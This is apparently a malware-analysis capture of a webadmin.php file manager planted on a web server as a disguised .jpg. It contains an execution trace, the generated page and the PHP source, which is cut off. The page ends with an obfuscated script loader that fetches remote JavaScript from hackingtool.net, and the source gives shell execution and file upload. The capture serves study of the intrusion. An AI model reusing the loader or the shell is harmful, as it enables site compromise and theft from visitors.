4	467	R			6
4	468	0	0.025704	802928	sizeof	0		/var/www/html/uploads/lildoo.php	1385	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	468	1	0.025801	802960
4	468	R			6
4	469	0	0.025827	803024	html	1		/var/www/html/uploads/lildoo.php	1387	1	'/var/www/html/uploads/'
5	470	0	0.025849	803024	htmlentities	0		/var/www/html/uploads/lildoo.php	1594	3	'/var/www/html/uploads/'	2	NULL
5	470	1	0.025873	803296
5	470	R			'/var/www/html/uploads/'
4	469	1	0.025899	803184
4	469	R			'/var/www/html/uploads/'
3		A						/var/www/html/uploads/lildoo.php	1390	$actions = []
4	471	0	0.026014	802328	dirname	0		/var/www/html/uploads/lildoo.php	1391	1	'/var/www/html/uploads/prepend.php'
4	471	1	0.026040	802424
4	471	R			'/var/www/html/uploads'
4	472	0	0.026066	802392	is_writable	0		/var/www/html/uploads/lildoo.php	1391	1	'/var/www/html/uploads'
4	472	1	0.026096	802432
4	472	R			TRUE
3		A						/var/www/html/uploads/lildoo.php	1392	$actions[] = 'delete'
3		A						/var/www/html/uploads/lildoo.php	1393	$actions[] = 'move'
3		A						/var/www/html/uploads/lildoo.php	1395	$actions[] = 'copy'
4	473	0	0.026185	802704	str_repeat	0		/var/www/html/uploads/lildoo.php	1398	2	'&nbsp;'	30
4	473	1	0.026207	802992
4	473	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	474	0	0.026235	802760	word	1		/var/www/html/uploads/lildoo.php	1402	1	'delete'
5	475	0	0.026252	802760	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'delete'	2	'UTF-8'
5	475	1	0.026272	803032
5	475	R			'delete'
4	474	1	0.026291	802920
4	474	R			'delete'
4	476	0	0.026309	802752	word	1		/var/www/html/uploads/lildoo.php	1402	1	'move'
5	477	0	0.026328	802752	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'move'	2	'UTF-8'
5	477	1	0.026347	803024
5	477	R			'move'
4	476	1	0.026364	802912
4	476	R			'move'
4	478	0	0.026383	802752	word	1		/var/www/html/uploads/lildoo.php	1402	1	'copy'
5	479	0	0.026399	802752	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'copy'	2	'UTF-8'
5	479	1	0.026418	803024
5	479	R			'copy'
4	478	1	0.026435	802912
4	478	R			'copy'
3	206	1	0.026454	802216
3	480	0	0.026464	802216	html_footer	1		/var/www/html/uploads/lildoo.php	1225	0
3	480	1	0.026480	802216
2	50	1	0.026491	792880
1	3	1	0.026507	792880
			0.026571	575664
TRACE END   [2023-02-13 01:08:40.652355]


Generated HTML code

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<meta http-equiv="Content-Type" content="text/html; charset=">

<title>webadmin.php</title>

<style type="text/css">
body { font: small sans-serif; text-align: center }
img { width: 17px; height: 13px }
a, a:visited { text-decoration: none; color: navy }
hr { border-style: none; height: 1px; background-color: silver; color: silver }
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
.listing th, .listing td { padding: 1px 3pt 0 3pt }
.listing th { border: 1px solid silver }
.listing td { border: 1px solid #ddd; background: white }
.listing .checkbox { text-align: center }
.listing .filename { text-align: left }
.listing .size { text-align: right }
.listing th.permission { text-align: left }
.listing td.permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .functions { text-align: left }
.listing_footer td { background: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
#directory { background: #eee; border: 1px solid silver }
#upload { padding-top: 1em }
#create { padding-bottom: 1em }
.small, .small option { font-size: x-small }
textarea { border: none; background: white }
table.dialog { margin-left: auto; margin-right: auto }
td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
#permission { margin-left: auto; margin-right: auto }
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
td.permission_action { text-align: right }
#symlink { background: #eee; border: 1px solid silver }
#symlink td { text-align: left; padding: 3pt }
#red_button { width: 120px; color: #400 }
#green_button { width: 120px; color: #040 }
#error td { background: maroon; color: white; border: 1px solid silver }
#notice td { background: green; color: white; border: 1px solid silver }
#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
code { font-size: 12pt }
td { white-space: nowrap }
</style>

<script type="text/javascript">
<!--
function activate (name) {
	if (document && document.forms[0] && document.forms[0].elements['focus']) {
		document.forms[0].elements['focus'].value = name;
	}
}
//-->
</script>

</head>
<body>

<h1 style="margin-bottom: 0">webadmin.php</h1>

<form enctype="multipart/form-data" action="server.php.jpg" method="post">

<table id="main">
<tbody><tr>
	<td colspan="7" id="directory">
		<a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F">Directory</a>:
		<input type="text" name="dir" size="30" value="/var/www/html/" onfocus="activate('directory')">
		<input type="submit" name="changedir" value="change" onfocus="activate('directory')">
	</td>
</tr>
<tr>
	<td colspan="7" id="upload">
		File:
		<input type="file" name="upload" onfocus="activate('other')">
		<input type="submit" name="submit_upload" value="upload" onfocus="activate('other')">
	</td>
</tr>
<tr>
	<td colspan="7" id="create">
		<select name="create_type" size="1" onfocus="activate('create')">
		<option value="file">File</option>
		<option value="directory">Directory</option>
		</select>
		<input type="text" name="create_name" onfocus="activate('create')">
		<input type="submit" name="submit_create" value="create" onfocus="activate('create')">
	</td>
</tr>
<tr class="listing">
	<th style="text-align: center; vertical-align: middle"><img src="server.php.jpg?image=smiley" alt="smiley"></th>
	<th class="filename"><a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F&amp;sort=filename&amp;reverse=true">Filename</a> ∧</th>
	<th class="size"><a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F&amp;sort=size">Size</a></th>
	<th class="permission"><a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F&amp;sort=permission">Permission</a></th>
	<th class="owner"><a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F&amp;sort=owner">Owner</a></th>
	<th class="group"><a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F&amp;sort=group">Group</a></th>
	<th class="functions">Functions</th>
</tr>
<tr class="listing">
	<td class="checkbox"><input type="checkbox" name="checked0" value="true" onfocus="activate('other')"></td>
	<td class="filename" title="mtime: 2/12/23 18:04:07, atime: 2/12/23 18:04:09, ctime: 2/12/23 18:04:07"><img src="server.php.jpg?image=folder" alt="folder"> [ <a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F.">.</a> ]</td>
	<td class="size" title="4 kB">4096 B</td>
	<td class="permission" title="40777">drwxrwxrwx</td>
	<td class="owner" title="uid: 0">root</td>
	<td class="group" title="gid: 0">root</td>
	<td class="functions">
		<input type="hidden" name="file0" value="/var/www/html/.">
		<select class="small" name="action0" size="1">
		<option value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</option>
		<option value="create_symlink">create symlink</option>
		<option value="delete">delete</option>
		<option value="rename">rename</option>
		<option value="move">move</option>
		</select>
		<input class="small" type="submit" name="submit0" value=" > " onfocus="activate('other')">
	</td>
</tr>
<tr class="listing">
	<td class="checkbox"><input type="checkbox" name="checked1" value="true" onfocus="activate('other')"></td>
	<td class="filename" title="mtime: 2/12/23 18:04:07, atime: 2/12/23 17:39:34, ctime: 2/12/23 18:04:07"><img src="server.php.jpg?image=folder" alt="folder"> [ <a href="server.php.jpg?dir=%2Fvar%2Fwww%2Fhtml%2F..">..</a> ]</td>
	<td class="size" title="4 kB">4096 B</td>
	<td class="permission" title="40777">drwxrwxrwx</td>
	<td class="owner" title="uid: 0">root</td>
	<td class="group" title="gid: 0">root</td>
	<td class="functions">
		<input type="hidden" name="file1" value="/var/www/html/..">
		<select class="small" name="action1" size="1">
		<option value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</option>
		<option value="create_symlink">create symlink</option>
		<option value="delete">delete</option>
		<option value="rename">rename</option>
		<option value="move">move</option>
		</select>
		<input class="small" type="submit" name="submit1" value=" > " onfocus="activate('other')">
	</td>
</tr>
<tr class="listing">
	<td class="checkbox"><input type="checkbox" name="checked2" value="true" onfocus="activate('other')"></td>
	<td class="filename" title="mtime: 2/12/23 18:04:07, atime: 2/12/23 18:04:07, ctime: 2/12/23 18:04:07"><img src="server.php.jpg?image=file" alt="file"> <a href="server.php.jpg?action=view&amp;file=%2Fvar%2Fwww%2Fhtml%2Fbeneri.se_malware_analysis">beneri.se_malware_analysis</a></td>
	<td class="size">0 B</td>
	<td class="permission" title="100644">-rw-r--r--</td>
	<td class="owner" title="uid: 0">root</td>
	<td class="group" title="gid: 0">root</td>
	<td class="functions">
		<input type="hidden" name="file2" value="/var/www/html/beneri.se_malware_analysis">
		<select class="small" name="action2" size="1">
		<option value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</option>
		<option value="create_symlink">create symlink</option>
		<option value="delete">delete</option>
		<option value="rename">rename</option>
		<option value="move">move</option>
		<option value="copy">copy</option>
		<option value="download">download</option>
		</select>
		<input class="small" type="submit" name="submit2" value=" > " onfocus="activate('other')">
	</td>
</tr>
<tr class="listing">
	<td class="checkbox"><input type="checkbox" name="checked3" value="true" onfocus="activate('other')"></td>
	<td class="filename" title="mtime: 2/12/23 18:04:07, atime: 2/12/23 18:04:09, ctime: 2/12/23 18:04:07"><img src="server.php.jpg?image=file" alt="file"> <a href="server.php.jpg?action=view&amp;file=%2Fvar%2Fwww%2Fhtml%2Fserver.php.jpg">server.php.jpg</a></td>
	<td class="size" title="75.8 kB">77659 B</td>
	<td class="permission" title="100664">-rw-rw-r--</td>
	<td class="owner" title="uid: 1000">osboxes</td>
	<td class="group" title="gid: 1000">osboxes</td>
	<td class="functions">
		<input type="hidden" name="file3" value="/var/www/html/server.php.jpg">
		<select class="small" name="action3" size="1">
		<option value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</option>
		<option value="create_symlink">create symlink</option>
		<option value="delete">delete</option>
		<option value="rename">rename</option>
		<option value="move">move</option>
		<option value="copy">copy</option>
		<option value="download">download</option>
		</select>
		<input class="small" type="submit" name="submit3" value=" > " onfocus="activate('other')">
	</td>
</tr>
<tr class="listing_footer">
	<td style="text-align: right; vertical-align: top"><img src="server.php.jpg?image=arrow" alt=">"></td>
	<td colspan="6">
		<input type="hidden" name="num" value="4">
		<input type="hidden" name="focus" value="">
		<input type="hidden" name="olddir" value="/var/www/html/">
		<select class="small" name="action_all" size="1">
		<option value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</option>
		<option value="delete">delete</option>
		<option value="move">move</option>
		<option value="copy">copy</option>
		</select>
		<input class="small" type="submit" name="submit_all" value=" > " onfocus="activate('other')">
	</td>
</tr>
</tbody></table>

</form>



<script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%264F%26311')</script><script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script><script src="https://hackingtool.net/logs/ciz.js"></script> </body></html>

Original PHP code

<?php
/*
 * webadmin.php - a simple Web-based file manager
 * Copyright (C) 2004-2011  Daniel Wacker [daniel dot wacker at web dot de]
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 *
 * -------------------------------------------------------------------------
 * While using this script, do NOT navigate with your browser's back and
 * forward buttons! Always open files in a new browser tab!
 * -------------------------------------------------------------------------
 *
 * This is Version 0.9, revision 12
 * =========================================================================
 *
 * Changes of revision 12
 * [bhb at o2 dot pl]
 *    added Polish translation
 * [daniel dot wacker at web dot de]
 *    switched to UTF-8
 *    fixed undefined variable
 *
 * Changes of revision 11
 * [daniel dot wacker at web dot de]
 *    fixed handling if folder isn't readable
 *
 * Changes of revision 10
 * [alex dash smirnov at web.de]
 *    added Russian translation
 * [daniel dot wacker at web dot de]
 *    added </td> to achieve valid XHTML (thanks to Marc Magos)
 *    improved delete function
 * [ava at asl dot se]
 *    new list order: folders first
 *
 * Changes of revision 9
 * [daniel dot wacker at web dot de]
 *    added workaround for directory listing, if lstat() is disabled
 *    fixed permisson of uploaded files (thanks to Stephan Duffner)
 *
 * Changes of revision 8
 * [okankan at stud dot sdu dot edu dot tr]
 *    added Turkish translation
 * [j at kub dot cz]
 *    added Czech translation
 * [daniel dot wacker at web dot de]
 *    improved charset handling
 *
 * Changes of revision 7
 * [szuniga at vtr dot net]
 *    added Spanish translation
 * [lars at soelgaard dot net]
 *    added Danish translation
 * [daniel dot wacker at web dot de]
 *    improved rename dialog
 *
 * Changes of revision 6
 * [nederkoorn at tiscali dot nl]
 *    added Dutch translation
 *
 * Changes of revision 5
 * [daniel dot wacker at web dot de]
 *    added language auto select
 *    fixed symlinks in directory listing
 *    removed word-wrap in edit textarea
 *
 * Changes of revision 4
 * [daloan at guideo dot fr]
 *    added French translation
 * [anders at wiik dot cc]
 *    added Swedish translation
 *
 * Changes of revision 3
 * [nzunta at gabriele dash erba dot it]
 *    improved Italian translation
 *
 * Changes of revision 2
 * [daniel dot wacker at web dot de]
 *    got images work in some old browsers
 *    fixed creation of directories
 *    fixed files deletion
 *    improved path handling
 *    added missing word 'not_created'
 * [till at tuxen dot de]
 *    improved human readability of file sizes
 * [nzunta at gabriele dash erba dot it]
 *    added Italian translation
 *
 * Changes of revision 1
 * [daniel dot wacker at web dot de]
 *    webadmin.php completely rewritten:
 *    - clean XHTML/CSS output
 *    - several files selectable
 *    - support for windows servers
 *    - no more treeview, because
 *      - webadmin.php is a >simple< file manager
 *      - performance problems (too much additional code)
 *      - I don't like: frames, java-script, to reload after every treeview-click
 *    - execution of shell scripts
 *    - introduced revision numbers
 *
/* ------------------------------------------------------------------------- */

/* Your language:
 * 'en' - English
 * 'de' - German
 * 'fr' - French
 * 'it' - Italian
 * 'nl' - Dutch
 * 'se' - Swedish
 * 'sp' - Spanish
 * 'dk' - Danish
 * 'tr' - Turkish
 * 'cs' - Czech
 * 'ru' - Russian
 * 'pl' - Polish
 * 'auto' - autoselect
 */
$lang = 'auto';

/* Homedir:
 * For example: './' - the script's directory
 */
$homedir = './';

/* Size of the edit textarea
 */
$editcols = 80;
$editrows = 25;

/* -------------------------------------------
 * Optional configuration (remove # to enable)
 */

/* Permission of created directories:
 * For example: 0705 would be 'drwx---r-x'.
 */
# $dirpermission = 0705;

/* Permission of created files:
 * For example: 0604 would be '-rw----r--'.
 */
# $filepermission = 0604;

/* Filenames related to the apache web server:
 */
$htaccess = '.htaccess';
$htpasswd = '.htpasswd';

/* ------------------------------------------------------------------------- */

if (get_magic_quotes_gpc()) {
	array_walk($_GET, 'strip');
	array_walk($_POST, 'strip');
	array_walk($_REQUEST, 'strip');
}

if (array_key_exists('image', $_GET)) {
	header('Content-Type: image/gif');
	die(getimage($_GET['image']));
}

if (!function_exists('lstat')) {
	function lstat ($filename) {
		return stat($filename);
	}
}

$delim = DIRECTORY_SEPARATOR;

if (function_exists('php_uname')) {
	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
} else {
	$win = ($delim == '\\') ? true : false;
}

if (!empty($_SERVER['PATH_TRANSLATED'])) {
	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} elseif (function_exists('getcwd')) {
	$scriptdir = getcwd();
} else {
	$scriptdir = '.';
}
$homedir = relative2absolute($homedir, $scriptdir);

$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;

if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
	$dir = relative2absolute($dir, $_POST['olddir']);
}

$directory = simplify_path(addslash($dir));

$files = array();
$action = '';
if (!empty($_POST['submit_all'])) {
	$action = $_POST['action_all'];
	for ($i = 0; $i < $_POST['num']; $i++) {
		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
			$files[] = $_POST["file$i"];
		}
	}
} elseif (!empty($_REQUEST['action'])) {
	$action = $_REQUEST['action'];
	$files[] = relative2absolute($_REQUEST['file'], $directory);
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
	$files[] = $_FILES['upload'];
	$action = 'upload';
} elseif (array_key_exists('num', $_POST)) {
	for ($i = 0; $i < $_POST['num']; $i++) {
		if (array_key_exists("submit$i", $_POST)) break;
	}
	if ($i < $_POST['num']) {
		$action = $_POST["action$i"];
		$files[] = $_POST["file$i"];
	}
}
if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
	$files[] = relative2absolute($_POST['create_name'], $directory);
	switch ($_POST['create_type']) {
	case 'directory':
		$action = 'create_directory';
		break;
	case 'file':
		$action = 'create_file';
	}
}
if (sizeof($files) == 0) $action = ''; else $file = reset($files);

if ($lang == 'auto') {
	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
	} else {
		$lang = 'en';
	}
}

$words = getwords($lang);

if ($site_charset == 'auto') {
	$site_charset = $word_charset;
}

$cols = ($win) ? 4 : 7;

if (!isset($dirpermission)) {
	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
}
if (!isset($filepermission)) {
	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
}

if (!empty($_SERVER['SCRIPT_NAME'])) {
	$self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
	$self = html(basename($_SERVER['PHP_SELF']));
} else {
	$self = '';
}

if (!empty($_SERVER['SERVER_SOFTWARE'])) {
	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
		$apache = true;
	} else {
		$apache = false;
	}
} else {
	$apache = true;
}

switch ($action) {

case 'view':

	if (is_script($file)) {

		/* highlight_file is a mess! */
		ob_start();
		highlight_file($file);
		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
		ob_end_clean();

		html_header();
		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>

<hr />

<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';

		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";

		echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
<pre style="margin-top: 0">' . $src . '</pre>
</td>
</tr>
</table>

';

		html_footer();

	} else {

		header('Content-Type: ' . getmimetype($file));
		header('Content-Disposition: filename=' . basename($file));

		readfile($file);

	}

	break;

case 'download':

	header('Pragma: public');
	header('Expires: 0');
	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
	header('Content-Type: ' . getmimetype($file));
	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
	header('Content-Length: ' . filesize($file));

	readfile($file);

	break;

case 'upload':

	$dest = relative2absolute($file['name'], $directory);

	if (@file_exists($dest)) {
		listing_page(error('already_exists', $dest));
	} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
		@chmod($dest, $filepermission);
		listing_page(notice('uploaded', $file['name']));
	} else {
		listing_page(error('not_uploaded', $file['name']));
	}

	break;

case 'create_directory':

	if (@file_exists($file)) {
		listing_page(error('already_exists', $file));
	} else {
		$old = @umask(0777 & ~$dirpermission);
		if (@mkdir($file, $dirpermission)) {
			listing_page(notice('created', $file));
		} else {
			listing_page(error('not_created', $file));
		}
		@umask($old);
	}

	break;

case 'create_file':

	if (@file_exists($file)) {
		listing_page(error('already_exists', $file));
	} else {
		$old = @umask(0777 & ~$filepermission);
		if (@touch($file)) {
			edit($file);
		} else {
			listing_page(error('not_created', $file));
		}
		@umask($old);
	}

	break;

case 'execute':

	chdir(dirname($file));

	$output = array();
	$retval = 0;
	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);

	$error = ($retval == 0) ? false : true;

	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');

	if ($error) {
		listing_page(error('not_executed', $file, implode("\n", $output)));
	} else {
		listing_page(notice('executed', $file, implode("\n", $output)));
	}

	break;

case 'delete':

	if (!empty($_POST['no'])) {
		listing_page();
	} elseif (!empty($_POST['yes'])) {

		$failure = array();
		$success = array();

		foreach ($files as $file) {
			if (del($file)) {
				$success[] = $file;
			} else {
				$failure[] = $file;
			}
		}

		$message = '';
		if (sizeof($failure) > 0) {
			$message = error('not_deleted', implode("\n", $failure));
		}
		if (sizeof($success) > 0) {
			$message .= notice('deleted', implode("\n", $success));
		}

		listing_page($message);

	} else {

		html_header();

		echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';

		request_dump();

		echo "\t<b>" . word('really_delete') . '</b>
	<p>
';

		foreach ($files as $file) {
			echo "\t" . html($file) . "<br />\n";
		}

		echo '	</p>
	<hr />
	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
</td>
</tr>
</table>
</form>

';

		html_footer();

	}

	break;

case 'rename':

	if (!empty($_POST['destination'])) {

		$dest = relative2absolute($_POST['destination'], $directory);

		if (!@file_exists($dest) && @rename($file, $dest)) {
			listing_page(notice('renamed', $file, $dest));
		} else {
			listing_page(error('not_renamed', $file, $dest));
		}

	} else {

		$name = basename($file);

		html_header();

		echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
	<input type="hidden" name="action" value="rename" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />
	<b>' . word('rename_file') . '</b>
	<p>' . html($file) . '</p>
	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
	<hr />
	<input type="submit" value="' . word('rename') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

		html_footer();

	}

	break;

case 'move':

	if (!empty($_POST['destination'])) {

		$dest = relative2absolute($_POST['destination'], $directory);

		$failure = array();
		$success = array();

		foreach ($files as $file) {
			$filename = substr($file, strlen($directory));
			$d = $dest . $filename;
			if (!@file_exists($d) && @rename($file, $d)) {
				$success[] = $file;
			} else {
				$failure[] = $file;
			}
		}

		$message = '';
		if (sizeof($failure) > 0) {
			$message = error('not_moved', implode("\n", $failure), $dest);
		}
		if (sizeof($success) > 0) {
			$message .= notice('moved', implode("\n", $success), $dest);
		}

		listing_page($message);

	} else {

		html_header();

		echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
';

		request_dump();

		echo "\t<b>" . word('move_files') . '</b>
	<p>
';

		foreach ($files as $file) {
			echo "\t" . html($file) . "<br />\n";
		}

		echo '	</p>
	<hr />
	' . word('destination') . ':
	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
	<input type="submit" value="' . word('move') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

		html_footer();

	}

	break;

case 'copy':

	if (!empty($_POST['destination'])) {

		$dest = relative2absolute($_POST['destination'], $directory);

		if (@is_dir($dest)) {

			$failure = array();
			$success = array();

			foreach ($files as $file) {
				$filename = substr($file, strlen($directory));
				$d = addslash($dest) . $filename;
